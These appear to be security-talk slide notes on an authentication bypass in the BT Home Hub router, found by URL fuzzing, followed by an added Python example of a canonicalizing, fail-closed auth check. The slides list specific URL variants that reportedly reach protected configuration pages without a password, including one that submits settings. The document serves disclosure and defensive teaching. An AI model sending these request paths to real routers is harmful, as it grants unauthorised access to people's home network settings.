- Real example: BT Home Hub (tested on firmware 6.2.2.6)
  - possibly the most popular DSL router in the UK
- Auth bypass found via URL fuzzing
- Web server accepts multiple representations of URLs, some of which are not checked for a password
- We append special symbols after the directory name, e.g.:
  - /cgi/b/secpol/cfg/%5C
  - /cgi/b/secpol/cfg//
  - /cgi/b/secpol/cfg/%
  - /cgi/b/secpol/cfg/~
- If we need to submit parameters, we append them after double special symbols: /cgi/b/_wli_/cfg//?ce=1&be=1&l0=4&l1=0
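
The class of flaw described above, shown from the defender's side as an added example (not code from the slides or from the router firmware): a password gate that compares the raw request path misses every variant listed, while a gate that canonicalizes first, matches on a directory boundary and fails closed catches them all. The function names, the `PROTECTED_DIRS` table and the treatment of a backslash as a path separator are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumption: protected directories taken from the paths shown on the slide.
PROTECTED_DIRS = ("/cgi/b/secpol/cfg", "/cgi/b/_wli_/cfg")
BAD_ESCAPE = re.compile(r"%(?![0-9A-Fa-f]{2})")  # '%' not followed by two hex digits
# Request targets copied from the slide, used here as regression cases.
SLIDE_VARIANTS = [
    "/cgi/b/secpol/cfg/%5C",
    "/cgi/b/secpol/cfg//",
    "/cgi/b/secpol/cfg/%",
    "/cgi/b/secpol/cfg/~",
    "/cgi/b/_wli_/cfg//?ce=1&be=1&l0=4&l1=0",
]


def naive_requires_auth(target: str) -> bool:
    """Hypothetical flawed gate: exact match on the raw path (one trailing '/' allowed)."""
    path = target.split("?", 1)[0]
    if path.endswith("/"):
        path = path[:-1]
    return path in PROTECTED_DIRS


def canonical_path(target: str) -> str:
    """Reduce a request target to one canonical path; raise ValueError if malformed."""
    path = target.split("?", 1)[0]
    if BAD_ESCAPE.search(path):
        raise ValueError("malformed percent-escape")
    path = unquote(path, errors="strict").replace("\\", "/")  # decode exactly once
    if "\x00" in path:
        raise ValueError("NUL byte in path")
    return posixpath.normpath("/" + path.lstrip("/"))  # collapse '//', '.', '..'


def requires_auth(target: str) -> bool:
    """Hardened gate: canonicalize, match on a directory boundary, fail closed."""
    try:
        path = canonical_path(target)
    except ValueError:
        return True  # unparseable request is never served unauthenticated
    return any(path == d or path.startswith(d + "/") for d in PROTECTED_DIRS)


if __name__ == "__main__":
    for t in SLIDE_VARIANTS:
        print(f"{t!r}: naive={naive_requires_auth(t)} hardened={requires_auth(t)}")
```

The same canonical path must also be the one the request router dispatches on; if the gate and the handler lookup normalize differently, the mismatch reappears.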